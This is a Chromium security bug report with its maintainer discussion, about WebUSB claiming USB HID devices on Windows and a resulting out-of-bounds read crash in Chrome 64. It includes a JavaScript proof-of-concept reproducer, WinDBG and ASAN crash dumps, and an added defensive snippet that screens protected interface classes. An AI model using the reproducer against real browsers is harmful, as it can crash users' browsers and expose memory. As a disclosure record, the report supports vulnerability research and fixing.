Security: WebUSB HID Device Access + OOB Read / Crash Via WebUSB transferIn
Reported by verv...@gmail.com, Mar 3 2018
Issue description
VULNERABILITY DETAILS
On Windows 10, USB HID devices can be claimed via the WebUSB API.
When doing a transferIn call on the claimed USB device, the main browser process will crash after a non-deterministic time has passed (between a few seconds and a few minutes). The crash is sometimes an OOB heap read, sometimes a read from an invalid pointer (see below). ASAN will also report an overlapping memcpy call and sometimes an OOB heap read.
This seems to depend on the device (I tested the Feitian ePass and the Yubikey Neo). For the crash analysis in WinDBG (64.0.3282.186 (Official Build) (64-bit)) and the ASAN crash report (asan-win32-release_x64-539034), see below. I suspect a race condition that leads to memory corruption.
Two security issues are relevant here:
1. HID devices should not be allowed to be claimed via WebUSB;
2. OOB memory access.
VERSION
Chrome Version: 64.0.3282.186 (Official Build) (64-bit) stable, asan-win32-release_x64-539034
Operating System: Windows 10 Enterprise Build 16299.rs3_release.170928-1534, running on VMWare Workstation 14
REPRODUCTION CASE
Connect a HID device (e.g. Yubikey NEO or Feitian ePass). The following JavaScript should reproduce the issue:
~~~
async function crashWebUSB() {
  // filters here: http://www.linux-usb.org/usb.ids
  let device;
  try {
    device = await navigator.usb.requestDevice({ filters: [] });
    // registerDevice(device);
    console.log(device.configuration.interfaces);
    await device.open();
    await device.selectConfiguration(1); // Select configuration #1 for the device.
    await device.claimInterface(0);      // Request exclusive control over interface #0.
    await device.selectAlternateInterface(0, 0);
    // ++ anti tests
    // await device.open()
    // return device.open()
    //   .then(() => {
    //     if (device.configuration === null) {
    //       return device.selectConfiguration(1)
    //     }
    //   })
    //   .then(() => device.claimInterface(2))
    console.log("Claimed USB Device");
    console.log("Trying to receive some data");
    // nondeterministic time until crash here, firing up multiple transfers seems to make it faster
    device.transferIn(4, 4096).then(result => {
      console.log('<', result.data.buffer);
    });
  } catch (e) {
    console.log(e);
  }
}
crashWebUSB();
~~~
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: browser
Crash State:
## Crash Chrome Version 64.0.3282.186 (Official Build) (64-bit), Yubikey NEO - U2F HID
WinDBG crash analysis:
0:042> !analyze -v
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Google\Chrome\Application\chrome.exe -
GetUrlPageData2 (WinHttp) failed: 12007.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
chrome!IsSandboxedProcess+ed77a7
00007ffa`2fd7acf3 0f10440af0 movups xmm0,xmmword ptr [rdx+rcx-10h]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffa2fd7acf3 (chrome!IsSandboxedProcess+0x0000000000ed77a7)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000020cc862c110
Attempt to read from address 0000020cc862c110
FAULTING_THREAD: 00000b30
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: chrome.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 0000020cc862c110
FOLLOWUP_IP:
chrome!IsSandboxedProcess+ed77a7
00007ffa`2fd7acf3 0f10440af0 movups xmm0,xmmword ptr [rdx+rcx-10h]
READ_ADDRESS: 0000020cc862c110
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 00007ffa2eece0ed to 00007ffa2fd7acf3
STACK_TEXT:
000000ab`bffff2d8 00007ffa`2eece0ed : 00000000`00000002 00007ffa`2eecf032 0000020b`cde36990 00007ffa`2eed2c29 : chrome!IsSandboxedProcess+0xed77a7
000000ab`bffff2e0 00007ffa`2eec9a9a : 00000000`00000001 00000000`00000000 00000000`00000002 0000020b`cac1a6e0 : chrome!IsSandboxedProcess+0x2aba1
000000ab`bffff330 00007ffa`2eed27d2 : 00008885`ff6b1e9f 0000020b`cd92b8e0 00000000`00000000 00000000`00000000 : chrome!IsSandboxedProcess+0x2654e
000000ab`bffff3f0 00007ffa`2eed2319 : 00007ffa`2ff36d58 00007ffa`2d7412cb 00000000`00000030 00000000`00000030 : chrome!IsSandboxedProcess+0x2f286
000000ab`bffff480 00007ffa`2eed289a : 00000009`00000009 000000ab`00000000 00000000`00000017 00007ffa`2d744455 : chrome!IsSandboxedProcess+0x2edcd
000000ab`bffff4e0 00007ffa`2eebaf77 : 00007d51`bb2c1ba4 000000ab`bffff678 0000020b`cda9ab50 00000000`00000014 : chrome!IsSandboxedProcess+0x2f34e
000000ab`bffff520 00007ffa`2d858e4f : 0000020b`c591aae0 00007ffa`2d75ed62 00000000`00000000 00000000`00000000 : chrome!IsSandboxedProcess+0x17a2b
000000ab`bffff6c0 00007ffa`2e62eb72 : ffffffff`ffffffff 00000000`00000000 00000000`00000000 00000000`00000000 : chrome!ovly_debug_event+0x11318f
000000ab`bffff760 00007ffa`5de41fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : chrome!GetHandleVerifier+0xef72
000000ab`bffff7e0 00007ffa`5dfdefc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
000000ab`bffff810 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
SYMBOL_NAME: chrome!IsSandboxedProcess+ed77a7
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: chrome
IMAGE_NAME: chrome.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5a8e35df
STACK_COMMAND: ~42s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_chrome.dll!IsSandboxedProcess
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_chrome!IsSandboxedProcess+ed77a7
---------
## Chrome asan-win32-release_x64-539034 - Crash-Yubikey-U2F:
Running the test in ASAN gives a "memcpy-param-overlap" error when run with the YubiKey U2F or YubiKey NEO. For Feitian devices it will give a heap OOB read. Here is the crash information for the YubiKey NEO:
=================================================================
==4836==ERROR: AddressSanitizer: memcpy-param-overlap: memory ranges [0x120baea5d120,0x120caea5d11f) and [0x120badf89d01, 0x120cadf89d00) overlap
0x120baea5e127 is located 0 bytes to the right of 4135-byte region [0x120baea5d100,0x120baea5e127)
allocated by thread T0 here:
Thread T56 created by T46 here:
Thread T46 created by T0 here:
0x120badf8ad02 is located 0 bytes to the right of 4098-byte region [0x120badf89d00,0x120badf8ad02)
allocated by thread T46 here:
SUMMARY: AddressSanitizer: memcpy-param-overlap (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x14003afd8)
==4836==ABORTING
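The interface-class screen behind the report's first point, as an added example (not code from the report or from Chromium): it walks a USBDevice-shaped object and refuses to claim any interface whose alternate settings declare a protected class, HID (0x03) being the one this report exercises. The protected-class table mirrors the WebUSB specification's list as I recall it, and the composite device below is a constructed mock, not a real descriptor dump.

```javascript
// Added example (not from the bug report): the interface-class screen a
// WebUSB implementation or a cautious web app applies before claimInterface().

// USB interface class codes treated as protected (assumed from the WebUSB
// spec's protected-interface-class list; 0x03 = HID is the class this report hits).
const PROTECTED_CLASSES = new Map([
  [0x01, 'Audio'],
  [0x03, 'HID'],
  [0x08, 'Mass Storage'],
  [0x0b, 'Smart Card'],
  [0x0e, 'Video'],
  [0x10, 'Audio/Video'],
  [0xe0, 'Wireless Controller'],
]);

// One record per interface of the active configuration. An interface counts as
// protected if ANY alternate setting declares a protected class, because a page
// could claim it and then switch alternates with selectAlternateInterface().
function classifyInterfaces(device) {
  if (!device.configuration) {
    throw new Error('no active configuration: call selectConfiguration() first');
  }
  return device.configuration.interfaces.map((iface) => {
    const classes = iface.alternates.map((alt) => alt.interfaceClass);
    const hit = classes.find((c) => PROTECTED_CLASSES.has(c));
    return {
      interfaceNumber: iface.interfaceNumber,
      classes,
      protected: hit !== undefined,
      reason: hit === undefined ? null : PROTECTED_CLASSES.get(hit),
    };
  });
}

// Guard around device.claimInterface(): protected interfaces are rejected
// before the call reaches the device.
async function claimInterfaceGuarded(device, interfaceNumber) {
  const record = classifyInterfaces(device)
    .find((r) => r.interfaceNumber === interfaceNumber);
  if (!record) {
    throw new Error(`interface ${interfaceNumber} not present in active configuration`);
  }
  if (record.protected) {
    throw new Error(`refusing to claim interface ${interfaceNumber}: protected class ${record.reason}`);
  }
  return device.claimInterface(interfaceNumber);
}

// Constructed stand-in for a USBDevice: a composite token with a U2F HID
// interface (0x03), a CCID smart-card interface (0x0b), a vendor-specific
// interface that only becomes HID in alternate setting 1, and a plain
// vendor-specific interface. The layout is illustrative, not a real device.
function makeMockDevice() {
  const claimed = [];
  return {
    claimed,
    configuration: {
      configurationValue: 1,
      interfaces: [
        { interfaceNumber: 0, alternates: [{ alternateSetting: 0, interfaceClass: 0x03 }] },
        { interfaceNumber: 1, alternates: [{ alternateSetting: 0, interfaceClass: 0x0b }] },
        { interfaceNumber: 2, alternates: [
          { alternateSetting: 0, interfaceClass: 0xff },
          { alternateSetting: 1, interfaceClass: 0x03 }, // protected only in alt 1
        ] },
        { interfaceNumber: 3, alternates: [{ alternateSetting: 0, interfaceClass: 0xff }] },
      ],
    },
    async claimInterface(n) { claimed.push(n); },
  };
}

// Runs the guard against every interface of the mock; returns what happened
// per interface and which interfaces actually reached claimInterface().
async function demo() {
  const device = makeMockDevice();
  const outcome = {};
  for (const { interfaceNumber } of classifyInterfaces(device)) {
    try {
      await claimInterfaceGuarded(device, interfaceNumber);
      outcome[interfaceNumber] = 'claimed';
    } catch (e) {
      outcome[interfaceNumber] = e.message;
    }
  }
  return { outcome, claimed: device.claimed };
}

demo().then((r) => console.log(r));
```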
Comment 1 by elawrence@chromium.org, Mar 4 2018
I think what's going on here is that a latent feature in libusb is trying to provide a translation between raw USB commands and the Windows HID driver in order to make the device available. We should disable this path entirely as we never want libusb doing this translation.
Mar 4 2018
Another interesting note: the transferIn calls will block. But if a U2F authentication is started in another window, they will return empty ArrayBuffers via DataView. I suspect there is some initialization going on internally and the device is accessed in parallel by WebUSB and the U2F extension.
Mar 5 2018
vervier@: Can you please provide a few crash IDs from chrome://crashes from your repros on an official build? reillyg@: Do you mind owning this? This bug is just for the crash, since we already knew about the security implications of the first part (claiming HID devices via WebUSB).
Mar 5 2018
Sure, here are crash IDs from Version 64.0.3282.186 (Official Build) (64-bit):
Uploaded Crash Report ID 7cfe1034a64407c5 (Local Crash ID: f1bdc24e-9ac0-4c02-b423-552ff972650c) (Yubikey NEO)
Uploaded Crash Report ID a9df17569b1cb730 (Local Crash ID: ce417622-c8ea-42cc-8498-5ab0fdb9cd70) (Feitian ePass U2F)
Uploaded Crash Report ID a9e61aa6e636254d (Local Crash ID: 3fe7eddf-8958-475d-ab0d-5dee55d40618) (Yubikey NEO)
Mar 5 2018
Thanks. Confirmed that those show OOB reads while receiving USB device data.
Mar 23 2018
r541265 removed the HID backend from libusb, making this issue obsolete.
Apr 1 2018
Hello! I'm afraid the VRP panel declined to reward for this report. However, do you know if the OOB read is still accessible over the HID APIs we still expose? If so we could reconsider.
Apr 1 2018
The HID API we still expose (the chrome.hid API) is a separate implementation.
Apr 2 2018
Hi, the OOB read access was triggered via the WebUSB API. You removed access to the whole HID device class, so at least this vector should be gone. However, I would not rule out that this is triggerable via other vectors, since I do not see any fix for the root cause. Unfortunately I can't currently afford to invest more of my free time to investigate this more deeply. From the panel's point of view, what is the difference between me finding an additional vector to trigger this and the current one that you fixed after my report?
Markus
Apr 2 2018
Can you elaborate on what you believe the root cause to be? libusb uses separate code for I/O operations through HID and WinUSB. The HID path, which is what performed the OOB access, has been removed. The WinUSB path has no analogous function.
Apr 2 2018
The OOB access looks to me like a race condition when accessing the device (could have been concurrently with chrome.hid or the U2F plugin). When you investigated the bug, could you confirm the cause was internal to the libusb HID path? If not, could it be possible that the OOB read just occurred there, and the root cause was external? In the latter case it might make sense to try to debug this further.
Jun 19 2018
After examining this bug and issue 818592 , the VRP panel has decided to award $5,000 for this report. Amongst other causes of confusion, the code change mentioned in comment 9 referenced 818592 and we presumed the change was made in response to that issue, not this. Comment 4 of issue 818592 shows that wasn't the case, and we should have initially rewarded this report. A member of our finance team will be in touch to arrange for payment or, should you choose, donation. We'd also like to thank you for your WebUSB security research presented at OffensiveCon, and would like to note that it might also have been eligible for a reward had you worked with us before making it public.
Jun 30 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot